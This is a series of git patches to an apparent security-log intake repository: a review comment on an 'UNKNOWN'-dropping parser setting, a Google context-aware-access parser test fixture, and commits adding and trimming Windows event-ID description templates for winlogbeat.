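Review bot: `ignored_values: ["UNKNOWN"]` is added at the top level of the parser rather than inside the new `set_context_aware_fields` stage, so — if this setting applies to every field the parser emits, as its placement suggests — any field from any stage whose value is the literal string `UNKNOWN` will be dropped, not only `device.id` derived from `CAA_DEVICE_ID`. Nothing in the hunk records that scope or the reason for it; I would add above the line `# drop the placeholder "UNKNOWN" (seen for CAA_DEVICE_ID when there are no device signals) from every emitted field`, and confirm that none of the other applications handled by this intake rely on `UNKNOWN` being preserved as a value.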
@@ -0,0 +1,58 @@ +{ + "input": { + "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-07T14:23:22.470Z\",\"uniqueQualifier\":\"-7203312395540000000\",\"applicationName\":\"context_aware_access\",\"customerId\":\"C02i38lll\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi3fFQ\\\"\",\"actor\":{\"callerType\":\"USER\",\"email\":\"john.doe@test.com\",\"profileId\":\"117564289545555555555\"},\"ipAddress\":\"9.3.2.1\",\"events\":[{\"type\":\"CONTEXT_AWARE_ACCESS_USER_EVENT\",\"name\":\"MONITOR_MODE_ACCESS_DENY_EVENT\",\"parameters\":[{\"name\":\"CAA_ACCESS_LEVEL_APPLIED\",\"multiValue\":[\"is admin-approved IOS\",\"is admin-approved android\",\"Is Corporate Device\"]},{\"name\":\"CAA_ACCESS_LEVEL_UNSATISFIED\",\"multiValue\":[\"is admin-approved android\",\"Crowdstrike Compliant Device\",\"is admin-approved IOS\",\"Is Corporate Device\"]},{\"name\":\"CAA_APPLICATION\",\"value\":\"GMAIL\"},{\"name\":\"BLOCKED_API_ACCESS\",\"multiValue\":[\"GMAIL\"]},{\"name\":\"CAA_DEVICE_ID\",\"value\":\"UNKNOWN\"},{\"name\":\"CAA_DEVICE_STATE\",\"value\":\"No Device Signals\"}]}]}", + "sekoiaio": { + "intake": { + "dialect": "Google Report", + "dialect_uuid": "04d36706-ee4a-419b-906d-f92f3a46bcdd" + } + } + }, + "expected": { + "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-07T14:23:22.470Z\",\"uniqueQualifier\":\"-7203312395540000000\",\"applicationName\":\"context_aware_access\",\"customerId\":\"C02i38lll\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi3fFQ\\\"\",\"actor\":{\"callerType\":\"USER\",\"email\":\"john.doe@test.com\",\"profileId\":\"117564289545555555555\"},\"ipAddress\":\"9.3.2.1\",\"events\":[{\"type\":\"CONTEXT_AWARE_ACCESS_USER_EVENT\",\"name\":\"MONITOR_MODE_ACCESS_DENY_EVENT\",\"parameters\":[{\"name\":\"CAA_ACCESS_LEVEL_APPLIED\",\"multiValue\":[\"is admin-approved IOS\",\"is admin-approved android\",\"Is Corporate Device\"]},{\"name\":\"CAA_ACCESS_LEVEL_UNSATISFIED\",\"multiValue\":[\"is 
admin-approved android\",\"Crowdstrike Compliant Device\",\"is admin-approved IOS\",\"Is Corporate Device\"]},{\"name\":\"CAA_APPLICATION\",\"value\":\"GMAIL\"},{\"name\":\"BLOCKED_API_ACCESS\",\"multiValue\":[\"GMAIL\"]},{\"name\":\"CAA_DEVICE_ID\",\"value\":\"UNKNOWN\"},{\"name\":\"CAA_DEVICE_STATE\",\"value\":\"No Device Signals\"}]}]}", + "event": { + "action": "MONITOR_MODE_ACCESS_DENY_EVENT", + "dataset": "admin#reports#activity", + "type": [ + "denied" + ] + }, + "@timestamp": "2024-11-07T14:23:22.470000Z", + "cloud": { + "account": { + "id": "C02i38lll" + } + }, + "google": { + "report": { + "access": { + "application": "GMAIL" + }, + "actor": { + "email": "john.doe@test.com" + } + } + }, + "network": { + "application": "context_aware_access" + }, + "related": { + "ip": [ + "9.3.2.1" + ], + "user": [ + "john.doe" + ] + }, + "source": { + "address": "9.3.2.1", + "ip": "9.3.2.1" + }, + "user": { + "domain": "test.com", + "email": "john.doe@test.com", + "id": "117564289545555555555", + "name": "john.doe" + } + } +} \ No newline at end of file From 4f2e1bfea597d812bf2dcb478bebdc59684e770d Mon Sep 17 00:00:00 2001 From: LenaigKaliou Date: Thu, 14 Nov 2024 16:57:21 +0100 Subject: [PATCH 19/84] Updated smart descriptions --- .../winlogbeat/_meta/smart-descriptions.json | 1129 +++++++++++++++++ 1 file changed, 1129 insertions(+) diff --git a/Beats/winlogbeat/_meta/smart-descriptions.json b/Beats/winlogbeat/_meta/smart-descriptions.json index eb6a595a2..5eaf6dc64 100644 --- a/Beats/winlogbeat/_meta/smart-descriptions.json +++ b/Beats/winlogbeat/_meta/smart-descriptions.json 
@@ -1,4 +1,1133 @@ [ + { + "value": "{action.properties.TargetDomainName}\\{action.properties.TargetUserName} logged on to {host.hostname} (LogonType {action.properties.LogonType})", + "relationships": [ + { + "source": "action.properties.TargetUserName", + "target": "host.hostname", + "type": "logged on to" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4624 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{action.properties.TargetDomainName}\\{action.properties.TargetUserName} logged on to {host.hostname} from IP {source.ip} (LogonType {action.properties.LogonType})", + "relationships": [ + { + "source": "action.properties.TargetUserName", + "target": "host.hostname", + "type": "logged on to" + }, + { + "source": "action.properties.TargetUserName", + "target": "source.ip", + "type": "connected from" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4624 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + }, + { + "field": "source.ip" + } + ] + }, + { + "value": "{action.properties.TargetUserSid} failed to log on to {host.hostname} (LogonType {action.properties.LogonType})", + "relationships": [ + { + "source": "action.properties.TargetUserSid", + "target": "host.hostname", + "type": "failed to log on to" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4625 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{action.properties.TargetDomainName}\\{action.properties.TargetUserName} failed to log on to {host.hostname} (LogonType {action.properties.LogonType})", + "relationships": [ + { + "source": "action.properties.TargetUserName", + "target": "host.hostname", + "type": "failed to log on to" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4625 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + 
} + ] + }, + { + "value": "{action.properties.TargetDomainName}\\{action.properties.TargetUserName} failed to log on to {host.hostname} from IP {source.ip} (LogonType {action.properties.LogonType})", + "relationships": [ + { + "source": "action.properties.TargetUserName", + "target": "host.hostname", + "type": "failed to log on to" + }, + { + "source": "action.properties.TargetUserName", + "target": "source.ip", + "type": "connected from" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4625 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + }, + { + "field": "source.ip" + } + ] + }, + { + "value": "{action.properties.TargetDomainName}\\{action.properties.TargetUserName} logged off from {host.hostname}", + "relationships": [ + { + "source": "action.properties.TargetUserName", + "target": "host.hostname", + "type": "logged off from" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4634 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{action.properties.TargetDomainName}\\{action.properties.TargetUserName} attempted to log on to {action.properties.TargetServerName} using explicit credentials", + "relationships": [ + { + "source": "action.properties.TargetUserName", + "target": "action.properties.TargetServerName", + "type": "attempted to log on to" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4648 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{action.properties.TargetDomainName}\\{action.properties.TargetUserName} attempted to log on to {host.hostname} using explicit credentials", + "relationships": [ + { + "source": "action.properties.TargetUserName", + "target": "host.hostname", + "type": "attempted to log on to" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4648 + }, + { + "field": "event.provider", + "value": 
"Microsoft-Windows-Security-Auditing" + }, + { + "field": "action.properties.TargetServerName", + "value": "localhost" + } + ] + }, + { + "value": "{action.properties.SubjectDomainName}\\{action.properties.SubjectUserName} accessed the object {action.properties.ObjectName} on {host.hostname}", + "relationships": [ + { + "source": "action.properties.SubjectUserName", + "target": "action.properties.ObjectName", + "type": "accessed" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4662 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{user.domain}\\{user.name} logged on to {host.name} with special privileges", + "relationships": [ + { + "source": "user.name", + "target": "host.name", + "type": "logged on to" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4672 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{action.properties.SubjectDomainName}\\{action.properties.SubjectUserName} logged on to {host.name} with special privileges", + "relationships": [ + { + "source": "action.properties.SubjectUserName", + "target": "host.name", + "type": "logged on to" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4672 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{user.domain}\\{user.name} executed {process.command_line} on {host.hostname}", + "relationships": [ + { + "source": "user.name", + "target": "process.command_line", + "type": "executed" + }, + { + "source": "user.name", + "target": "process.parent.executable", + "type": "executed" + }, + { + "source": "process.command_line", + "target": "jost.hostname", + "type": "executed on" + }, + { + "source": "process.command_line", + "target": "process.executable", + "type": "uses executable" + }, + { + "source": "process.parent.executable", + "target": "host.hostname", + "type": 
"executed on" + }, + { + "source": "process.parent.executable", + "target": "process.command_line", + "type": "started" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4688 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "Process {process.name} exited. It was executed by {user.domain}\\{user.name} on {host.name}", + "relationships": [ + { + "source": "user.name", + "target": "process.executable", + "type": "executed" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4689 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{user.domain}\\{user.name} created account {action.properties.TargetDomainName}\\{action.properties.TargetUserName} on {host.name}", + "relationships": [ + { + "source": "user.name", + "target": "action.properties.TargetDomainName", + "type": "created account" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4720 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{user.domain}\\{user.name} enabled account {action.properties.TargetDomainName}\\{action.properties.TargetUserName}", + "relationships": [ + { + "source": "user.name", + "target": "action.properties.TargetDomainName", + "type": "enabled account" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4722 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{user.domain}\\{user.name} changed their password on {host.hostname}", + "relationships": [ + { + "source": "user.name", + "target": "host.hostname", + "type": "changed their password on" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4723 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + }, + { + "field": "action.outcome", + "value": "success" + } + ] + }, + { + 
"value": "{user.domain}\\{user.name} failed to change their password on {host.hostname}", + "relationships": [ + { + "source": "user.name", + "target": "host.hostname", + "type": "failed to change their password on" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4723 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + }, + { + "field": "action.outcome", + "value": "failure" + } + ] + }, + { + "value": "{user.domain}\\{user.name} disabled account {action.properties.TargetDomainName}\\{action.properties.TargetUserName}", + "relationships": [ + { + "source": "user.name", + "target": "action.properties.TargetUserName", + "type": "disabled account" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4725 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{user.domain}\\{user.name} deleted account {action.properties.TargetDomainName}\\{action.properties.TargetUserName} on {host.name}", + "relationships": [ + { + "source": "user.name", + "target": "action.properties.TargetUserName", + "type": "deleted account" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4726 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{user.domain}\\{user.name} created group {action.properties.TargetDomainName}\\{action.properties.TargetUserName}", + "relationships": [ + { + "source": "user.name", + "target": "action.properties.TargetUserName", + "type": "created group" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4727 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{user.domain}\\{user.name} effectuated changes about {action.properties.TargetDomainName}\\{action.properties.TargetUserName}", + "relationships": [ + { + "source": "user.name", + "target": "action.properties.TargetUserName", + 
"type": "effectuated changes about" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4742 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{user.domain}\\{user.name} created security-disabled local group {action.properties.TargetDomainName}\\{action.properties.TargetUserName}", + "relationships": [ + { + "source": "user.name", + "target": "action.properties.TargetUserName", + "type": "created security-disabled local group" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4744 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{user.domain}\\{user.name} effectuated changes about the security-disabled global group {action.properties.TargetDomainName}\\{action.properties.TargetUserName}", + "relationships": [ + { + "source": "user.name", + "target": "action.properties.TargetUserName", + "type": "effectuated changes about" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4750 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{action.properties.TargetDomainName}\\{action.properties.TargetUserName} failed to authenticate from {source.ip} (Error Code: {action.properties.Status})", + "relationships": [ + { + "source": "action.properties.TargetUserName", + "target": "source.ip", + "type": "failed to log authenticate from" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4768 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{action.properties.TargetDomainName}\\{action.properties.TargetUserName} successfully authenticated from {source.ip}", + "relationships": [ + { + "source": "action.properties.TargetUserName", + "target": "source.ip", + "type": "authenticated from" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4768 + }, + { + 
"field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + }, + { + "field": "action.outcome", + "value": "success" + } + ] + }, + { + "value": "{action.properties.TargetDomainName}\\{action.properties.TargetUserName} was denied a service ticket for {action.properties.ServiceName} from {source.ip} (Error Code: {action.properties.Status})", + "relationships": [ + { + "source": "action.properties.TargetUserName", + "target": "action.properties.ServiceName", + "type": "was denied a ticket for" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4769 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{action.properties.TargetDomainName}\\{action.properties.TargetUserName} was granted a service ticket for {action.properties.ServiceName} from {source.ip}", + "relationships": [ + { + "source": "action.properties.TargetUserName", + "target": "action.properties.ServiceName", + "type": "was granted a ticket for" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4769 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + }, + { + "field": "action.outcome", + "value": "success" + } + ] + }, + { + "value": "{action.properties.TargetUserName} failed to authenticate from {source.ip}", + "relationships": [ + { + "source": "action.properties.TargetUserName", + "target": "source.ip", + "type": "failed to authenticate from" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4771 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{action.properties.TargetUserName} failed to authenticate on {action.properties.Workstation} (Reason: {action.properties.Status})", + "relationships": [ + { + "source": "action.properties.TargetUserName", + "target": "action.properties.Workstation", + "type": "failed to log on to" + } + ], + "conditions": [ + { + "field": "action.id", 
+ "value": 4776 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + }, + { + "field": "action.outcome", + "value": "failure" + } + ] + }, + { + "value": "{action.properties.TargetUserName} successfully authenticated on {action.properties.Workstation}", + "relationships": [ + { + "source": "action.properties.TargetUserName", + "target": "action.properties.Workstation", + "type": "logged on to" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4776 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + }, + { + "field": "action.outcome", + "value": "success" + } + ] + }, + { + "value": "{user.domain}\\{user.name} reconnected on session {action.properties.SessionName} on {host.hostname} from {source.ip}", + "relationships": [ + { + "source": "user.name", + "target": "action.properties.SessionName", + "type": "reconnected on session" + }, + { + "source": "user.name", + "target": "source.ip", + "type": "reconnected from" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4778 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + }, + { + "field": "source.ip" + } + ] + }, + { + "value": "{user.domain}\\{user.name} reconnected on session {action.properties.SessionName} on {host.hostname}", + "relationships": [ + { + "source": "user.name", + "target": "action.properties.SessionName", + "type": "reconnected on session" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4778 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{user.domain}\\{user.name} enumerated local groups of {action.properties.TargetDomainName}\\{action.properties.TargetUserName} on {host.hostname}", + "relationships": [ + { + "source": "user.name", + "target": "action.properties.TargetUserName", + "type": "enumerated local groups of" + } + ], + "conditions": [ + { + "field": "action.id", + 
"value": 4798 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{user.domain}\\{user.name} enumerated members of local group {action.properties.TargetUserName} on {log.hostname}", + "relationships": [ + { + "source": "user.name", + "target": "action.properties.TargetUserName", + "type": "enumerated members of" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4799 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "Authenticated user {user.name} was denied the access to Remote Desktop to {log.hostname} from IP {action.properties.ClientAddress}", + "relationships": [ + { + "source": "user.name", + "target": "log.hostname", + "type": "wad denied RDP access to" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4825 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{user.domain}\\{user.name} assigned a new logon to special group {action.properties.TargetDomainName}\\{action.properties.TargetUserName} on {host.hostname}", + "relationships": [ + { + "source": "user.name", + "target": "action.properties.TargetUserName", + "type": "assigned a new logon to special group" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4964 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{user.domain}\\{user.name} accessed network share {action.properties.ShareName} from IP {source.ip}", + "relationships": [ + { + "source": "user.name", + "target": "action.properties.ShareName", + "type": "accessed network share" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 5140 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{user.domain}\\{user.name} failed to access network share {action.properties.ShareName} 
from IP {source.ip}", + "relationships": [ + { + "source": "user.name", + "target": "action.properties.ShareName", + "type": "failed to access network share" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 5140 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + }, + { + "field": "action.outcome", + "value": "failure" + } + ] + }, + { + "value": "{user.domain}\\{user.name} was granted access to {action.properties.ShareName}\\{action.properties.RelativeTargetName} from IP {source.ip}", + "relationships": [ + { + "source": "user.name", + "target": "action.properties.RelativeTargetName", + "type": "accessed shared file" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 5145 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{user.domain}\\{user.name} was denied access to {action.properties.ShareName}\\{action.properties.RelativeTargetName} from IP {source.ip}", + "relationships": [ + { + "source": "user.name", + "target": "action.properties.RelativeTargetName", + "type": "failed to access shared file" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 5145 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + }, + { + "field": "action.outcome", + "value": "failure" + } + ] + }, + { + "value": "{host.hostname} allowed a connection from {action.properties.SourceAddress}:{action.properties.SourcePort} to {action.properties.DestAdress}:{action.properties.DestPort}", + "relationships": [ + { + "source": "action.properties.SourceAddress", + "target": "action.properties.DestAddress", + "type": "connected to" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 5156 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{user.domain}\\{user.name} executed PowerShell code on {host.name}", + "conditions": [ + { + "field": 
"action.id", + "value": 4103 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-PowerShell" + } + ] + }, + { + "value": "{user.id} executed PowerShell code on {host.name}", + "conditions": [ + { + "field": "action.id", + "value": 4104 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-PowerShell" + } + ] + }, + { + "value": "{user.domain}\\{user.name} executed PowerShell code on {host.name}", + "conditions": [ + { + "field": "action.id", + "value": 4104 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-PowerShell" + } + ] + }, + { + "value": "Started invocation of PowerShell ScriptBlock on {host.name}", + "conditions": [ + { + "field": "action.id", + "value": 4105 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-PowerShell" + } + ] + }, + { + "value": "Completed invocation of PowerShell ScriptBlock on {host.name}", + "conditions": [ + { + "field": "action.id", + "value": 4106 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-PowerShell" + } + ] + }, + { + "value": "Process {process.executable} created by {user.domain}\\{user.name} on {host.name}", + "relationships": [ + { + "source": "user.name", + "target": "process.command_line", + "type": "executed" + }, + { + "source": "process.command_line", + "target": "host.name", + "type": "executed on" + }, + { + "source": "process.command_line", + "target": "process.executable", + "type": "uses executable" + }, + { + "source": "process.parent.command_line", + "target": "process.parent.name", + "type": "uses executable" + }, + { + "source": "process.parent.command_line", + "target": "host.name", + "type": "executed on" + }, + { + "source": "process.parent.command_line", + "target": "process.command_line", + "type": "started" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 1 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Sysmon" + } + ] + }, + { + "value": "Process {process.executable} changed the 
creation time of the file {file.name} on {host.name}", + "relationships": [ + { + "source": "process.executable", + "target": "file.name", + "type": "changed creation time of" + }, + { + "source": "process.executable", + "target": "host.name", + "type": "executed on" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 2 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Sysmon" + } + ] + }, + { + "value": "Network connection from {source.ip} to {destination.ip}:{destination.port} by {process.executable} on {host.name}", + "relationships": [ + { + "source": "source.ip", + "target": "destination.ip", + "type": "connected to" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 3 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Sysmon" + } + ] + }, + { + "value": "{file.name} created by {process.executable} on {host.name}", + "conditions": [ + { + "field": "action.id", + "value": 11 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Sysmon" + } + ] + }, + { + "value": "Registry value {action.properties.TargetObject} created by {process.executable} on {log.hostname}", + "conditions": [ + { + "field": "action.id", + "value": 12 + }, + { + "field": "action.properties.MessEventType", + "value": "CreateValue" + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Sysmon" + } + ] + }, + { + "value": "Registry key {registry.key} set by {process.executable} on {host.name}", + "conditions": [ + { + "field": "action.id", + "value": 13 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Sysmon" + } + ] + }, + { + "value": "Sysmon configuration was updated on {host.name}", + "conditions": [ + { + "field": "action.id", + "value": 16 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Sysmon" + } + ] + }, + { + "value": "{host.name} performed a DNS query for name {dns.question.name} (status: {sysmon.dns.status})", + "conditions": [ + { + "field": "action.id", 
+ "value": 22 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Sysmon" + } + ] + }, { "value": "Auditing event on {winlog.computer_name}: {event.action}", "conditions": [ From a68dec425ee56f45f66ae948e194e23595e86436 Mon Sep 17 00:00:00 2001 From: LenaigKaliou Date: Thu, 14 Nov 2024 17:44:03 +0100 Subject: [PATCH 20/84] Small fixes --- .../winlogbeat/_meta/smart-descriptions.json | 51 ------------------- 1 file changed, 51 deletions(-) diff --git a/Beats/winlogbeat/_meta/smart-descriptions.json b/Beats/winlogbeat/_meta/smart-descriptions.json index 5eaf6dc64..a3b786729 100644 --- a/Beats/winlogbeat/_meta/smart-descriptions.json +++ b/Beats/winlogbeat/_meta/smart-descriptions.json @@ -1134,12 +1134,6 @@ { "field": "winlog.provider_guid", "value": "{54849625-5478-4994-a5ba-3e3b0328c30d}" - }, - { - "field": "winlog.computer_name" - }, - { - "field": "event.action" } ] }, @@ -1149,15 +1143,6 @@ { "field": "winlog.provider_guid", "value": "{54849625-5478-4994-a5ba-3e3b0328c30d}" - }, - { - "field": "winlog.computer_name" - }, - { - "field": "winlog.SubjectUserSid" - }, - { - "field": "event.action" } ] }, @@ -1171,15 +1156,6 @@ { "field": "event.action", "value": "Filtering Platform Connection" - }, - { - "field": "winlog.computer_name" - }, - { - "field": "winlog.event_data.SourceAddress" - }, - { - "field": "winlog.event_data.DestAddress" } ] }, @@ -1189,12 +1165,6 @@ { "field": "winlog.provider_guid", "value": "{555908d1-a6d7-4695-8e1e-26931d2012f4}" - }, - { - "field": "host.hostname" - }, - { - "field": "event.original" } ] }, @@ -1204,12 +1174,6 @@ { "field": "winlog.provider_guid", "value": "{5770385f-c22a-43e0-bf4c-06f5698ffbd9}" - }, - { - "field": "winlog.opcode" - }, - { - "field": "winlog.computer_name" } ] }, @@ -1219,9 +1183,6 @@ { "field": "winlog.provider_guid", "value": "{00000000-0000-0000-0000-000000000000}" - }, - { - "field": "winlog.computer_name" } ] }, 
@@ -1231,12 +1192,6 @@ { "field": "winlog.provider_guid", "value": "{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}" - }, - { - "field": "event.action" - }, - { - "field": "winlog.computer_name" } ] }, @@ -1246,12 +1201,6 @@ { "field": "event.module", "value": "powershell" - }, - { - "field": "event.action" - }, - { - "field": "winlog.computer_name" } ] }, From 60cfdc0bd0210d65b78ff4ef5cdbb8b25c7dcfc7 Mon Sep 17 00:00:00 2001 From: LenaigKaliou Date: Thu, 14 Nov 2024 17:58:27 +0100 Subject: [PATCH 21/84] Fixing details in smart description to avoid NULL --- .../winlogbeat/_meta/smart-descriptions.json | 426 ++++++++++++++++++ 1 file changed, 426 insertions(+) diff --git a/Beats/winlogbeat/_meta/smart-descriptions.json b/Beats/winlogbeat/_meta/smart-descriptions.json index a3b786729..ee074adf6 100644 --- a/Beats/winlogbeat/_meta/smart-descriptions.json +++ b/Beats/winlogbeat/_meta/smart-descriptions.json 
@@ -668,6 +668,158 @@ } ] }, + { + "value": "{user.name} reconnected on session {action.properties.SessionName} from {source.ip}", + "relationships": [ + { + "source": "user.name", + "target": "action.properties.SessionName", + "type": "reconnected on session" + }, + { + "source": "user.name", + "target": "source.ip", + "type": "reconnected from" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4778 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + }, + { + "field": "source.ip" + } + ] + }, + { + "value": "{user.name} reconnected on session {action.properties.SessionName} on {host.hostname}", + "relationships": [ + { + "source": "user.name", + "target": "action.properties.SessionName", + "type": "reconnected on session" + }, + { + "source": "user.name", + "target": "source.ip", + "type": "reconnected from" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4778 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + }, + { + "field":"host.hostname" + } + ] + }, + { + "value": "{user.name} reconnected on session {action.properties.SessionName}", + "relationships": [ + { + "source": "user.name", + "target": "action.properties.SessionName", + "type": "reconnected on session" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4778 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{user.domain}\\{user.name} reconnected on session {action.properties.SessionName} from {source.ip}", + "relationships": [ + { + "source": "user.name", + "target": "action.properties.SessionName", + "type": "reconnected on session" + }, + { + "source": "user.name", + "target": "source.ip", + "type": "reconnected from" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4778 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + }, + { + "field": "source.ip" + } + ] 
+ }, + { + "value": "{user.domain}\\{user.name} reconnected on session {action.properties.SessionName} on {host.hostname}", + "relationships": [ + { + "source": "user.name", + "target": "action.properties.SessionName", + "type": "reconnected on session" + }, + { + "source": "user.name", + "target": "source.ip", + "type": "reconnected from" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4778 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + }, + { + "field":"host.hostname" + } + ] + }, + { + "value": "{user.domain}\\{user.name} reconnected on session {action.properties.SessionName}", + "relationships": [ + { + "source": "user.name", + "target": "action.properties.SessionName", + "type": "reconnected on session" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4778 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, { "value": "{user.domain}\\{user.name} reconnected on session {action.properties.SessionName} on {host.hostname} from {source.ip}", "relationships": [ @@ -693,6 +845,9 @@ }, { "field": "source.ip" + }, + { + "field":"host.hostname" } ] }, @@ -776,6 +931,26 @@ } ] }, + { + "value": "{user.domain}\\{user.name} assigned a new logon to special group {action.properties.TargetDomainName}\\{action.properties.TargetUserName}", + "relationships": [ + { + 